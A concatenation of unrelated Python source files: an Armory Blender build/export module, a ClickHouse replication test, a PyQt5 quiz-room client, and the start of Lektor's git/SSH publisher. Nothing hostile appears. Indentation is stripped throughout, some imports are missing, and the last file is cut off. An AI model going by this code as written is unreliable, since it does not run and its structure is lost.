import arm.make_renderpath as make_renderpath
import arm.make_world as make_world
import arm.make_state as state
import arm.assets as assets
import arm.log as log
import arm.lib.make_datas
import arm.lib.server
from arm.exporter import ArmoryExporter
exporter = ArmoryExporter()
scripts_mtime = 0 # Monitor source changes
profile_time = 0
def run_proc(cmd, done):
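# Launch `cmd` as a subprocess and invoke the optional `done` callback from a
# watcher thread once the process exits; the Popen handle is returned immediately.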
def fn(p, done):
p.wait()
if done != None:
done()
p = subprocess.Popen(cmd)
threading.Thread(target=fn, args=(p, done)).start()
return p
def compile_shader_pass(res, raw_shaders_path, shader_name, defs, make_variants):
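# Read <shader_name>.json from the raw shader directory, generate the shader
# data via arm.lib.make_datas and copy the GLSL sources referenced by the
# first context into <build>/compiled/Shaders.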
os.chdir(raw_shaders_path + '/' + shader_name)
# Open json file
json_name = shader_name + '.json'
with open(json_name) as f:
json_file = f.read()
json_data = json.loads(json_file)
fp = arm.utils.get_fp_build()
arm.lib.make_datas.make(res, shader_name, json_data, fp, defs, make_variants)
path = fp + '/compiled/Shaders'
c = json_data['contexts'][0]
for s in ['vertex_shader', 'fragment_shader', 'geometry_shader', 'tesscontrol_shader', 'tesseval_shader']:
if s in c:
shutil.copy(c[s], path + '/' + c[s].split('/')[-1])
def remove_readonly(func, path, excinfo):
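# shutil.rmtree onerror handler: clear the read-only flag and retry the failed
# operation (typically needed for read-only files on Windows).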
os.chmod(path, stat.S_IWRITE)
func(path)
def export_data(fp, sdk_path):
global exporter
wrd = bpy.data.worlds['Arm']
print('\nArmory v{0} ({1})'.format(wrd.arm_version, wrd.arm_commit))
print('OS: ' + arm.utils.get_os() + ', Target: ' + state.target + ', GAPI: ' + arm.utils.get_gapi() + ', Blender: ' + bpy.app.version_string)
# Clean compiled variants if cache is disabled
build_dir = arm.utils.get_fp_build()
if wrd.arm_cache_build == False:
if os.path.isdir(build_dir + '/debug/html5-resources'):
shutil.rmtree(build_dir + '/debug/html5-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/krom-resources'):
shutil.rmtree(build_dir + '/krom-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/debug/krom-resources'):
shutil.rmtree(build_dir + '/debug/krom-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/windows-resources'):
shutil.rmtree(build_dir + '/windows-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/linux-resources'):
shutil.rmtree(build_dir + '/linux-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/osx-resources'):
shutil.rmtree(build_dir + '/osx-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/compiled/Shaders'):
shutil.rmtree(build_dir + '/compiled/Shaders', onerror=remove_readonly)
raw_shaders_path = sdk_path + '/armory/Shaders/'
assets_path = sdk_path + '/armory/Assets/'
export_physics = bpy.data.worlds['Arm'].arm_physics != 'Disabled'
export_navigation = bpy.data.worlds['Arm'].arm_navigation != 'Disabled'
export_ui = bpy.data.worlds['Arm'].arm_ui != 'Disabled'
assets.reset()
# Build node trees
ArmoryExporter.import_traits = []
make_logic.build()
make_world.build()
make_renderpath.build()
# Export scene data
assets.embedded_data = sorted(list(set(assets.embedded_data)))
physics_found = False
navigation_found = False
ui_found = False
ArmoryExporter.compress_enabled = state.is_publish and wrd.arm_asset_compression
ArmoryExporter.optimize_enabled = state.is_publish and wrd.arm_optimize_data
if not os.path.exists(build_dir + '/compiled/Assets'):
os.makedirs(build_dir + '/compiled/Assets')
for scene in bpy.data.scenes:
if scene.arm_export:
ext = '.zip' if ArmoryExporter.compress_enabled else '.arm'
asset_path = build_dir + '/compiled/Assets/' + arm.utils.safestr(scene.name) + ext
exporter.execute(bpy.context, asset_path, scene=scene)
if ArmoryExporter.export_physics:
physics_found = True
if ArmoryExporter.export_navigation:
navigation_found = True
if ArmoryExporter.export_ui:
ui_found = True
assets.add(asset_path)
if physics_found == False: # Disable physics if no rigid body is exported
export_physics = False
if navigation_found == False:
export_navigation = False
if ui_found == False:
export_ui = False
if wrd.arm_ui == 'Enabled':
export_ui = True
modules = []
if wrd.arm_audio == 'Enabled':
modules.append('audio')
if export_physics:
modules.append('physics')
if export_navigation:
modules.append('navigation')
if export_ui:
modules.append('ui')
if wrd.arm_formatlib == 'Enabled':
modules.append('format')
print('Exported modules: ' + str(modules))
defs = arm.utils.def_strings_to_array(wrd.world_defs)
cdefs = arm.utils.def_strings_to_array(wrd.compo_defs)
print('Shader flags: ' + str(defs))
if wrd.arm_debug_console:
print('Khafile flags: ' + str(assets.khafile_defs))
# Render path is configurable at runtime
has_config = wrd.arm_write_config or os.path.exists(arm.utils.get_fp() + '/Bundled/config.arm')
# Write compiled.inc
shaders_path = build_dir + '/compiled/Shaders'
if not os.path.exists(shaders_path):
os.makedirs(shaders_path)
write_data.write_compiledglsl(defs + cdefs, make_variants=has_config)
# Write referenced shader passes
if not os.path.isfile(build_dir + '/compiled/Shaders/shader_datas.arm') or state.last_world_defs != wrd.world_defs:
res = {}
res['shader_datas'] = []
for ref in assets.shader_passes:
# Ensure shader pass source exists
if not os.path.exists(raw_shaders_path + '/' + ref):
continue
assets.shader_passes_assets[ref] = []
if ref.startswith('compositor_pass'):
compile_shader_pass(res, raw_shaders_path, ref, defs + cdefs, make_variants=has_config)
else:
compile_shader_pass(res, raw_shaders_path, ref, defs, make_variants=has_config)
arm.utils.write_arm(shaders_path + '/shader_datas.arm', res)
for ref in assets.shader_passes:
for s in assets.shader_passes_assets[ref]:
assets.add_shader(shaders_path + '/' + s + '.glsl')
for file in assets.shaders_external:
name = file.split('/')[-1].split('\\')[-1]
target = build_dir + '/compiled/Shaders/' + name
if not os.path.exists(target):
shutil.copy(file, target)
state.last_world_defs = wrd.world_defs
# Reset path
os.chdir(fp)
# Copy std shaders
if not os.path.isdir(build_dir + '/compiled/Shaders/std'):
shutil.copytree(raw_shaders_path + 'std', build_dir + '/compiled/Shaders/std')
# Write config.arm
resx, resy = arm.utils.get_render_resolution(arm.utils.get_active_scene())
if wrd.arm_write_config:
write_data.write_config(resx, resy)
# Write khafile.js
enable_dce = state.is_publish and wrd.arm_dce
import_logic = not state.is_publish and arm.utils.logic_editor_space() != None
write_data.write_khafilejs(state.is_play, export_physics, export_navigation, export_ui, state.is_publish, enable_dce, ArmoryExporter.import_traits, import_logic)
# Write Main.hx - depends on write_khafilejs for writing number of assets
scene_name = arm.utils.get_project_scene_name()
write_data.write_mainhx(scene_name, resx, resy, state.is_play, state.is_publish)
if scene_name != state.last_scene or resx != state.last_resx or resy != state.last_resy:
wrd.arm_recompile = True
state.last_resx = resx
state.last_resy = resy
state.last_scene = scene_name
def compile(assets_only=False):
wrd = bpy.data.worlds['Arm']
fp = arm.utils.get_fp()
os.chdir(fp)
# Set build command
target_name = state.target
node_path = arm.utils.get_node_path()
khamake_path = arm.utils.get_khamake_path()
cmd = [node_path, khamake_path]
kha_target_name = arm.utils.get_kha_target(target_name)
if kha_target_name != '':
cmd.append(kha_target_name)
# Custom exporter
if state.is_export:
item = wrd.arm_exporterlist[wrd.arm_exporterlist_index]
if item.arm_project_target == 'custom' and item.arm_project_khamake != '':
for s in item.arm_project_khamake.split(' '):
cmd.append(s)
ffmpeg_path = arm.utils.get_ffmpeg_path() # Path to binary
if ffmpeg_path != '':
cmd.append('--ffmpeg')
cmd.append(ffmpeg_path) # '"' + ffmpeg_path + '"'
state.export_gapi = arm.utils.get_gapi()
cmd.append('-g')
cmd.append(state.export_gapi)
if arm.utils.get_legacy_shaders() or 'ios' in state.target:
if 'html5' in state.target or 'ios' in state.target:
pass
else:
cmd.append('--shaderversion')
cmd.append('110')
elif 'android' in state.target or 'html5' in state.target:
cmd.append('--shaderversion')
cmd.append('300')
else:
cmd.append('--shaderversion')
cmd.append('330')
if '_VR' in wrd.world_defs:
cmd.append('--vr')
cmd.append('webvr')
if arm.utils.get_rp().rp_renderer == 'Raytracer':
cmd.append('--raytrace')
cmd.append('dxr')
dxc_path = fp + '/HlslShaders/dxc.exe'
subprocess.Popen([dxc_path, '-Zpr', '-Fo', fp + '/Bundled/raytrace.cso', '-T', 'lib_6_3', fp + '/HlslShaders/raytrace.hlsl']).wait()
if arm.utils.get_khamake_threads() > 1:
cmd.append('--parallelAssetConversion')
cmd.append(str(arm.utils.get_khamake_threads()))
compilation_server = False
cmd.append('--to')
if (kha_target_name == 'krom' and not state.is_publish) or (kha_target_name == 'html5' and not state.is_publish):
cmd.append(arm.utils.build_dir() + '/debug')
# Start compilation server
if kha_target_name == 'krom' and arm.utils.get_compilation_server() and not assets_only and wrd.arm_cache_build:
compilation_server = True
arm.lib.server.run_haxe(arm.utils.get_haxe_path())
else:
cmd.append(arm.utils.build_dir())
if assets_only or compilation_server:
cmd.append('--nohaxe')
cmd.append('--noproject')
print("Running: ", cmd)
print("Using project from " + arm.utils.get_fp())
state.proc_build = run_proc(cmd, assets_done if compilation_server else build_done)
def build(target, is_play=False, is_publish=False, is_export=False):
global profile_time
profile_time = time.time()
state.target = target
state.is_play = is_play
state.is_publish = is_publish
state.is_export = is_export
# Save blend
if arm.utils.get_save_on_build():
bpy.ops.wm.save_mainfile()
log.clear()
# Set camera in active scene
active_scene = arm.utils.get_active_scene()
if active_scene.camera == None:
for o in active_scene.objects:
if o.type == 'CAMERA':
active_scene.camera = o
break
# Get paths
sdk_path = arm.utils.get_sdk_path()
raw_shaders_path = sdk_path + '/armory/Shaders/'
# Set dir
fp = arm.utils.get_fp()
os.chdir(fp)
# Create directories
wrd = bpy.data.worlds['Arm']
sources_path = 'Sources/' + arm.utils.safestr(wrd.arm_project_package)
if not os.path.exists(sources_path):
os.makedirs(sources_path)
# Save external scripts edited inside Blender
write_texts = False
for text in bpy.data.texts:
if text.filepath != '' and text.is_dirty:
write_texts = True
break
if write_texts:
area = bpy.context.area
old_type = area.type
area.type = 'TEXT_EDITOR'
for text in bpy.data.texts:
if text.filepath != '' and text.is_dirty and os.path.isfile(text.filepath):
area.spaces[0].text = text
bpy.ops.text.save()
area.type = old_type
# Save internal Haxe scripts
for text in bpy.data.texts:
if text.filepath == '' and text.name[-3:] == '.hx':
with open('Sources/' + arm.utils.safestr(wrd.arm_project_package) + '/' + text.name, 'w') as f:
f.write(text.as_string())
# Export data
export_data(fp, sdk_path)
if state.target == 'html5':
w, h = arm.utils.get_render_resolution(arm.utils.get_active_scene())
write_data.write_indexhtml(w, h, is_publish)
# Bundle files from include dir
if os.path.isdir('include'):
dest = '/html5/' if is_publish else '/debug/html5/'
for fn in glob.iglob(os.path.join('include', '**'), recursive=False):
shutil.copy(fn, arm.utils.build_dir() + dest + os.path.basename(fn))
def play_done():
state.proc_play = None
state.redraw_ui = True
log.clear()
def assets_done():
if state.proc_build == None:
return
result = state.proc_build.poll()
if result == 0:
# Connect to the compilation server
os.chdir(arm.utils.build_dir() + '/debug/')
cmd = [arm.utils.get_haxe_path(), '--connect', '6000', 'project-krom.hxml']
state.proc_build = run_proc(cmd, compilation_server_done)
else:
state.proc_build = None
state.redraw_ui = True
log.print_info('Build failed, check console')
def compilation_server_done():
if state.proc_build == None:
return
result = state.proc_build.poll()
if result == 0:
if os.path.exists('krom/krom.js'):
os.chmod('krom/krom.js', stat.S_IWRITE)
os.remove('krom/krom.js')
os.rename('krom/krom.js.temp', 'krom/krom.js')
build_done()
else:
state.proc_build = None
state.redraw_ui = True
log.print_info('Build failed, check console')
def build_done():
print('Finished in ' + str(time.time() - profile_time))
if state.proc_build == None:
return
result = state.proc_build.poll()
state.proc_build = None
state.redraw_ui = True
if result == 0:
bpy.data.worlds['Arm'].arm_recompile = False
build_success()
else:
log.print_info('Build failed, check console')
def patch():
if state.proc_build != None:
return
assets.invalidate_enabled = False
fp = arm.utils.get_fp()
os.chdir(fp)
asset_path = arm.utils.get_fp_build() + '/compiled/Assets/' + arm.utils.safestr(bpy.context.scene.name) + '.arm'
exporter.execute(bpy.context, asset_path, scene=bpy.context.scene)
if not os.path.isdir(arm.utils.build_dir() + '/compiled/Shaders/std'):
raw_shaders_path = arm.utils.get_sdk_path() + '/armory/Shaders/'
shutil.copytree(raw_shaders_path + 'std', arm.utils.build_dir() + '/compiled/Shaders/std')
node_path = arm.utils.get_node_path()
khamake_path = arm.utils.get_khamake_path()
cmd = [node_path, khamake_path, 'krom']
cmd.append('--shaderversion')
cmd.append('330')
cmd.append('--parallelAssetConversion')
cmd.append('4')
cmd.append('--to')
cmd.append(arm.utils.build_dir() + '/debug')
cmd.append('--nohaxe')
cmd.append('--noproject')
assets.invalidate_enabled = True
state.proc_build = run_proc(cmd, patch_done)
def patch_done():
js = 'iron.Scene.patch();'
write_patch(js)
state.proc_build = None
patch_id = 0
def write_patch(js):
global patch_id
with open(arm.utils.get_fp_build() + '/debug/krom/krom.patch', 'w') as f:
patch_id += 1
f.write(str(patch_id) + '\n')
f.write(js)
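# The patch file written above holds a monotonically increasing id on its first
# line followed by the JavaScript to run; it appears to be polled by the
# running Krom build when live patching is enabled (see arm_live_patch below).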
def runtime_to_target():
wrd = bpy.data.worlds['Arm']
if wrd.arm_runtime == 'Krom':
return 'krom'
else:
return 'html5'
def get_khajs_path(target):
if target == 'krom':
return arm.utils.build_dir() + '/debug/krom/krom.js'
else: # Browser
return arm.utils.build_dir() + '/debug/html5/kha.js'
def play():
global scripts_mtime
wrd = bpy.data.worlds['Arm']
log.clear()
build(target=runtime_to_target(), is_play=True)
khajs_path = get_khajs_path(state.target)
if not wrd.arm_cache_build or \
not os.path.isfile(khajs_path) or \
assets.khafile_defs_last != assets.khafile_defs or \
state.last_target != state.target:
wrd.arm_recompile = True
state.last_target = state.target
# Trait sources modified
state.mod_scripts = []
script_path = arm.utils.get_fp() + '/Sources/' + arm.utils.safestr(wrd.arm_project_package)
if os.path.isdir(script_path):
new_mtime = scripts_mtime
for fn in glob.iglob(os.path.join(script_path, '**', '*.hx'), recursive=True):
mtime = os.path.getmtime(fn)
if scripts_mtime < mtime:
arm.utils.fetch_script_props(fn) # Trait props
fn = fn.split('Sources/')[1]
fn = fn[:-3] #.hx
fn = fn.replace('/', '.')
state.mod_scripts.append(fn)
wrd.arm_recompile = True
if new_mtime < mtime:
new_mtime = mtime
scripts_mtime = new_mtime
if len(state.mod_scripts) > 0: # Trait props
arm.utils.fetch_trait_props()
compile(assets_only=(not wrd.arm_recompile))
def build_success():
log.clear()
wrd = bpy.data.worlds['Arm']
if state.is_play:
if wrd.arm_runtime == 'Browser':
# Start server
os.chdir(arm.utils.get_fp())
t = threading.Thread(name='localserver', target=arm.lib.server.run_tcp)
t.daemon = True
t.start()
html5_app_path = 'http://localhost:8040/' + arm.utils.build_dir() + '/debug/html5'
webbrowser.open(html5_app_path)
elif wrd.arm_runtime == 'Krom':
if wrd.arm_live_patch:
open(arm.utils.get_fp_build() + '/debug/krom/krom.patch', 'w').close()
if arm.utils.get_os() == 'win':
bin_ext = '' if state.export_gapi == 'direct3d11' else '_' + state.export_gapi
else:
bin_ext = '' if state.export_gapi == 'opengl' else '_' + state.export_gapi
krom_location, krom_path = arm.utils.krom_paths(bin_ext=bin_ext)
os.chdir(krom_location)
cmd = [krom_path, arm.utils.get_fp_build() + '/debug/krom', arm.utils.get_fp_build() + '/debug/krom-resources']
if arm.utils.get_os() == 'win':
cmd.append('--consolepid')
cmd.append(str(os.getpid()))
if wrd.arm_audio == 'Enabled':
cmd.append('--sound')
state.proc_play = run_proc(cmd, play_done)
elif state.is_publish:
sdk_path = arm.utils.get_sdk_path()
target_name = arm.utils.get_kha_target(state.target)
files_path = arm.utils.get_fp_build() + '/' + target_name
if (target_name == 'html5' or target_name == 'krom') and wrd.arm_minify_js:
# Minify JS
minifier_path = sdk_path + '/lib/armory_tools/uglifyjs/bin/uglifyjs'
if target_name == 'html5':
jsfile = files_path + '/kha.js'
else:
jsfile = files_path + '/krom.js'
args = [arm.utils.get_node_path(), minifier_path, jsfile, '-o', jsfile]
proc = subprocess.Popen(args)
proc.wait()
if target_name == 'krom':
# Copy Krom binaries
if state.target == 'krom-windows':
gapi = state.export_gapi
ext = '' if gapi == 'direct3d11' else '_' + gapi
krom_location = sdk_path + '/Krom/Krom' + ext + '.exe'
shutil.copy(krom_location, files_path + '/Krom.exe')
krom_exe = arm.utils.safestr(wrd.arm_project_name) + '.exe'
os.rename(files_path + '/Krom.exe', files_path + '/' + krom_exe)
elif state.target == 'krom-linux':
krom_location = sdk_path + '/Krom/Krom'
shutil.copy(krom_location, files_path)
krom_exe = arm.utils.safestr(wrd.arm_project_name)
os.rename(files_path + '/Krom', files_path + '/' + krom_exe)
krom_exe = './' + krom_exe
else:
krom_location = sdk_path + '/Krom/Krom.app'
shutil.copytree(krom_location, files_path + '/Krom.app')
game_files = os.listdir(files_path)
for f in game_files:
f = files_path + '/' + f
if os.path.isfile(f):
shutil.move(f, files_path + '/Krom.app/Contents/MacOS')
krom_exe = arm.utils.safestr(wrd.arm_project_name) + '.app'
os.rename(files_path + '/Krom.app', files_path + '/' + krom_exe)
# Serialize krom.js into krom.bin
if wrd.arm_minify_js:
cwd = os.getcwd()
fp = files_path
if state.target == 'krom-macos':
fp += '/' + krom_exe + '/Contents/MacOS'
krom_exe = './Krom'
os.chdir(fp)
args = [krom_exe, '.', '.', '--writebin']
proc = subprocess.Popen(args)
proc.wait()
os.chdir(cwd)
os.remove(fp + '/krom.js')
# Rename
ext = state.target.split('-')[-1] # krom-windows
new_files_path = files_path + '-' + ext
os.rename(files_path, new_files_path)
files_path = new_files_path
if target_name == 'html5':
print('Exported HTML5 package to ' + files_path)
elif target_name.startswith('ios') or target_name.startswith('osx'): # TODO: to macos
print('Exported XCode project to ' + files_path + '-build')
elif target_name.startswith('windows'):
print('Exported Visual Studio 2017 project to ' + files_path + '-build')
elif target_name.startswith('android-native'):
print('Exported Android Studio project to ' + files_path + '-build/' + arm.utils.safestr(wrd.arm_project_name))
elif target_name.startswith('krom'):
print('Exported Krom package to ' + files_path)
else:
print('Exported makefiles to ' + files_path + '-build')
def clean():
os.chdir(arm.utils.get_fp())
wrd = bpy.data.worlds['Arm']
# Remove build and compiled data
try:
if os.path.isdir(arm.utils.build_dir()):
shutil.rmtree(arm.utils.build_dir(), onerror=remove_readonly)
if os.path.isdir(arm.utils.get_fp() + '/build'): # Kode Studio build dir
shutil.rmtree(arm.utils.get_fp() + '/build', onerror=remove_readonly)
except:
print('Armory Warning: Some files in the build folder are locked')
# Remove compiled nodes
pkg_dir = arm.utils.safestr(wrd.arm_project_package).replace('.', '/')
nodes_path = 'Sources/' + pkg_dir + '/node/'
if os.path.isdir(nodes_path):
shutil.rmtree(nodes_path, onerror=remove_readonly)
# Remove khafile/korefile/Main.hx
if os.path.isfile('khafile.js'):
os.remove('khafile.js')
if os.path.isfile('korefile.js'):
os.remove('korefile.js')
if os.path.isfile('Sources/Main.hx'):
os.remove('Sources/Main.hx')
# Remove Sources/ dir if empty
if os.path.exists('Sources/' + pkg_dir) and os.listdir('Sources/' + pkg_dir) == []:
shutil.rmtree('Sources/' + pkg_dir, onerror=remove_readonly)
if os.path.exists('Sources') and os.listdir('Sources') == []:
shutil.rmtree('Sources/', onerror=remove_readonly)
# To recache signatures for batched materials
for mat in bpy.data.materials:
mat.signature = ''
mat.arm_cached = False
# Restart compilation server
if arm.utils.get_compilation_server():
arm.lib.server.kill_haxe()
print('Project cleaned')
|
test.py
|
import time
import os
import threading
import random
from contextlib import contextmanager
import pytest
from helpers.cluster import ClickHouseCluster
from helpers.network import PartitionManager
from helpers.test_tools import TSV
from helpers.client import CommandRequest
cluster = ClickHouseCluster(__file__)
node1 = cluster.add_instance('node1', config_dir='configs', with_zookeeper=True, macros={"layer": 0, "shard": 0, "replica": 1})
node2 = cluster.add_instance('node2', config_dir='configs', with_zookeeper=True, macros={"layer": 0, "shard": 0, "replica": 2})
nodes = [node1, node2]
@pytest.fixture(scope="module")
def started_cluster():
try:
cluster.start()
yield cluster
finally:
pass
cluster.shutdown()
def test_random_inserts(started_cluster):
# Duration of the test; reduce it if you don't want to wait
DURATION_SECONDS = 10  # * 60
node1.query("""
CREATE TABLE simple ON CLUSTER test_cluster (date Date, i UInt32, s String)
ENGINE = ReplicatedMergeTree('/clickhouse/tables/{shard}/simple', '{replica}', date, i, 8192)""")
with PartitionManager() as pm_random_drops:
for sacrifice in nodes:
pass # This test still doesn't work when network partitions are introduced
#pm_random_drops._add_rule({'probability': 0.01, 'destination': sacrifice.ip_address, 'source_port': 2181, 'action': 'REJECT --reject-with tcp-reset'})
#pm_random_drops._add_rule({'probability': 0.01, 'source': sacrifice.ip_address, 'destination_port': 2181, 'action': 'REJECT --reject-with tcp-reset'})
min_timestamp = int(time.time())
max_timestamp = min_timestamp + DURATION_SECONDS
num_timestamps = max_timestamp - min_timestamp + 1
bash_script = os.path.join(os.path.dirname(__file__), "test.sh")
inserters = []
for node in nodes:
cmd = ['/bin/bash', bash_script, node.ip_address, str(min_timestamp), str(max_timestamp), str(cluster.get_client_cmd())]
inserters.append(CommandRequest(cmd, timeout=DURATION_SECONDS * 2, stdin=''))
print(node.name, node.ip_address)
for inserter in inserters:
inserter.get_answer()
answer="{}\t{}\t{}\t{}\n".format(num_timestamps, num_timestamps, min_timestamp, max_timestamp)
for node in nodes:
res = node.query_with_retry("SELECT count(), uniqExact(i), min(i), max(i) FROM simple", check_callback=lambda res: TSV(res) == TSV(answer))
assert TSV(res) == TSV(answer), node.name + " : " + node.query("SELECT groupArray(_part), i, count() AS c FROM simple GROUP BY i ORDER BY c DESC LIMIT 1")
node1.query("""DROP TABLE simple ON CLUSTER test_cluster""")
class Runner:
def __init__(self):
self.mtx = threading.Lock()
self.total_inserted = 0
self.inserted_vals = set()
self.inserted_payloads = set()
self.stop_ev = threading.Event()
def do_insert(self, thread_num):
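# Each worker thread inserts pairs of consecutive values (x, x + 1) tagged with
# its own day of 2000-01 and records what was inserted, so the test can later
# verify that every replica converged to the same totals.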
self.stop_ev.wait(random.random())
year = 2000
month = '01'
day = str(thread_num + 1).zfill(2)
x = 1
while not self.stop_ev.is_set():
payload = """
{year}-{month}-{day} {x1}
{year}-{month}-{day} {x2}
""".format(year=year, month=month, day=day, x1=x, x2=(x + 1)).strip()
try:
random.choice(nodes).query("INSERT INTO repl_test FORMAT TSV", payload)
# print('thread {}: insert {}, {}'.format(thread_num, x, x + 1))
self.mtx.acquire()
if payload not in self.inserted_payloads:
self.inserted_payloads.add(payload)
self.inserted_vals.add(x)
self.inserted_vals.add(x + 1)
self.total_inserted += 2 * x + 1
self.mtx.release()
except Exception as e:
print('Exception:', e)
x += 2
self.stop_ev.wait(0.1 + random.random() / 10)
def test_insert_multithreaded(started_cluster):
DURATION_SECONDS = 50
for node in nodes:
node.query("DROP TABLE IF EXISTS repl_test")
for node in nodes:
node.query("CREATE TABLE repl_test(d Date, x UInt32) ENGINE ReplicatedMergeTree('/clickhouse/tables/test/repl_test', '{replica}') ORDER BY x PARTITION BY toYYYYMM(d)")
runner = Runner()
threads = []
for thread_num in range(5):
threads.append(threading.Thread(target=runner.do_insert, args=(thread_num, )))
for t in threads:
t.start()
time.sleep(DURATION_SECONDS)
runner.stop_ev.set()
for t in threads:
t.join()
# Sanity check: at least something was inserted
assert runner.total_inserted > 0
all_replicated = False
for i in range(100): # wait for replication 50 seconds max
time.sleep(0.5)
def get_delay(node):
return int(node.query("SELECT absolute_delay FROM system.replicas WHERE table = 'repl_test'").rstrip())
if all([get_delay(n) == 0 for n in nodes]):
all_replicated = True
break
assert all_replicated
actual_inserted = []
for i, node in enumerate(nodes):
actual_inserted.append(int(node.query("SELECT sum(x) FROM repl_test").rstrip()))
assert actual_inserted[i] == runner.total_inserted
|
Salas.py
|
import os
import sys
from random import shuffle, choice
from threading import Thread, Timer
from PyQt5.QtCore import pyqtSignal, QObject
from PyQt5.QtGui import QPixmap, QIcon, QStandardItem, QStandardItemModel, QCloseEvent
from PyQt5.QtWidgets import QPushButton, QWidget, QVBoxLayout, QListWidget, QLabel, QApplication, QAction, qApp, \
QListWidgetItem, QListView, QHBoxLayout
class Sala(QListWidgetItem):
def __init__(self, uuid: int, users: int, max: int, segundos: int, artist: list, image: QPixmap = None,
target=None):
super().__init__()
self.segundos = segundos
self.max = max
self.users = users
self.artist = artist
self.image = image
self.sala = uuid
# Sorry about this, but it would not let me use proper signals here.
self.signal = target
self.uptodate()
def trigger(self):
self.signal(self.sala)
def uptodate(self, users: int = None, max: int = None, segundos: int = None, artist: list = None,
image: QPixmap = None, **kwargs):
if users is not None:
self.users = users
if max is not None:
self.max = max
if segundos is not None:
self.segundos = segundos
if artist and isinstance(artist, list):
self.artist = artist
shuffle(self.artist)
while len(self.artist) < 2:
self.artist.append("")
if len(self.artist) > 2:
self.artist = self.artist[0:2]
self.setText(
"Users: {}/{} Time left: {}s artits: {}, {}".format(self.users, self.max, self.segundos, *self.artist))
if image and isinstance(image, QPixmap):
self.setIcon(QIcon(image))
class Salitas(QListWidget):
def __init__(self, parent=None, items=()):
super().__init__(parent)
for item in items:
if isinstance(item, Sala):
self.addItem(item)
self.doubleClicked.connect(self.manager)
def manager(self):
self.currentItem().trigger()
class Room(QWidget):
messages = pyqtSignal(dict)
def __init__(self, room):
super().__init__()
self.room = room
self.flag = True
self.setGeometry(150, 150, 400, 500)
self.setMaximumSize(400, 500)
self.setMinimumSize(400, 500)
self.setWindowIcon(QIcon(os.getcwd() + os.sep + "IMGS" + os.sep + "start_icon.png"))
principal = QVBoxLayout()
header = QHBoxLayout()
botones = QVBoxLayout()
self.getter = Timer(function=self.messages.emit, args=({'status': 'game',
'option': 'getbuttons',
'room': self.room},), interval=1)
self.getter.start()
self.buttons = [QPushButton("artist", self) for i in range(4)]
for button in self.buttons:
botones.addWidget(button, stretch=1)
button.pressed.connect(self.emit_self)
self.header = QLabel("Time left:{}".format(20),self)
header.addWidget(self.header, stretch=1)
principal.addLayout(header, stretch=6)
principal.addLayout(botones, stretch=1)
self.setLayout(principal)
def emit_self(self):
button = self.sender()
if self.room and self.flag:
self.flag = False
self.messages.emit({"status": "answer", "room": int(self.room), "content": button.text()})
def set_buttons(self, buttons: list):
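# Pad the candidate answers to four entries (repeating random ones if needed),
# shuffle them and assign the first four to the answer buttons.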
while len(buttons) < 4:
buttons.append(choice(buttons))
shuffle(buttons)
buttons = buttons[0:4]
for button, text in zip(self.buttons, buttons):
    button.setText(text)
def closeEvent(self, QCloseEvent):
self.getter.cancel()
self.messages.emit({"status": "leave"})
def receiver(self,rules: dict):
# Handle the flag change and add the color changes
if rules['status'] == 'answer_match':
for button in self.buttons:
if button.text() == rules['ans']:
if rules['succes']:
button.setObjectName("Correct")
self.header.setText("Correcto")
self.flag = True
else:
button.setObjectName("Incorrect")
self.flag = True
def console(target):
while True:
response = input("hi: ")
target.addItem(QListWidgetItem(response))
if __name__ == '__main__':
app = QApplication(sys.argv)
lista = Room(None)
lista.show()
console = Thread(target=console, args=(lista,), daemon=True)
console.start()
sys.exit(app.exec_())
|
publisher.py
|
import errno
import hashlib
import os
import posixpath
import select
import shutil
import subprocess
import tempfile
import threading
from contextlib import contextmanager
from ftplib import Error as FTPError
from werkzeug import urls
from lektor._compat import (iteritems, iterkeys, range_type, string_types,
text_type, queue, BytesIO, StringIO, PY2)
from lektor.exception import LektorException
from lektor.utils import locate_executable, portable_popen
def _patch_git_env(env_overrides, ssh_command=None):
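# Build the environment for git subprocesses: mirror the committer/author name
# and email onto each other (falling back to a default bot identity) and set
# GIT_SSH_COMMAND when a custom ssh command is required.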
env = dict(os.environ)
env.update(env_overrides or ())
keys = [
('GIT_COMMITTER_NAME', 'GIT_AUTHOR_NAME', 'Lektor Bot'),
('GIT_COMMITTER_EMAIL', 'GIT_AUTHOR_EMAIL',
'bot@getlektor.com'),
]
for key_a, key_b, default in keys:
value_a = env.get(key_a)
value_b = env.get(key_b)
if value_a:
if not value_b:
env[key_b] = value_a
elif value_b:
if not value_a:
env[key_a] = value_b
else:
env[key_a] = default
env[key_b] = default
if ssh_command is not None and not env.get('GIT_SSH_COMMAND'):
env['GIT_SSH_COMMAND'] = ssh_command
return env
def _write_ssh_key_file(temp_fn, credentials):
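# If the credentials point at a key file, return its path; if they carry an
# inline key ("TYPE:material", or bare material treated as RSA), write it to
# `temp_fn` as a PEM file with 0600 permissions and return that path instead.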
if credentials:
key_file = credentials.get('key_file')
if key_file is not None:
return key_file
key = credentials.get('key')
if key:
parts = key.split(':', 1)
if len(parts) == 1:
kt = 'RSA'
else:
kt, key = parts
with open(temp_fn, 'w') as f:
f.write('-----BEGIN %s PRIVATE KEY-----\n' % kt.upper())
for x in range_type(0, len(key), 64):
f.write(key[x:x + 64] + '\n')
f.write('-----END %s PRIVATE KEY-----\n' % kt.upper())
os.chmod(temp_fn, 0o600)
return temp_fn
return None
def _get_ssh_cmd(port=None, keyfile=None):
ssh_args = []
if port:
ssh_args.append('-p %s' % port)
if keyfile:
ssh_args.append('-i "%s"' % keyfile)
return 'ssh %s' % ' '.join(ssh_args)
@contextmanager
def _temporary_folder(env):
base = env.temp_path
try:
os.makedirs(base)
except OSError:
pass
folder = tempfile.mkdtemp(prefix='.deploytemp', dir=base)
scratch = os.path.join(folder, 'scratch')
os.mkdir(scratch)
os.chmod(scratch, 0o755)
try:
yield scratch
finally:
try:
shutil.rmtree(folder)
except (IOError, OSError):
pass
class PublishError(LektorException):
"""Raised by publishers if something goes wrong."""
class Command(object):
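# Thin wrapper around portable_popen: it can silence or capture stdout/stderr
# and, when capturing, exposes the combined output as an iterator of decoded lines.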
def __init__(self, argline, cwd=None, env=None, capture=True,
silent=False):
environ = dict(os.environ)
if env:
environ.update(env)
kwargs = {'cwd': cwd, 'env': environ}
if silent:
self.devnull = open(os.devnull, 'rb+')
kwargs['stdout'] = self.devnull
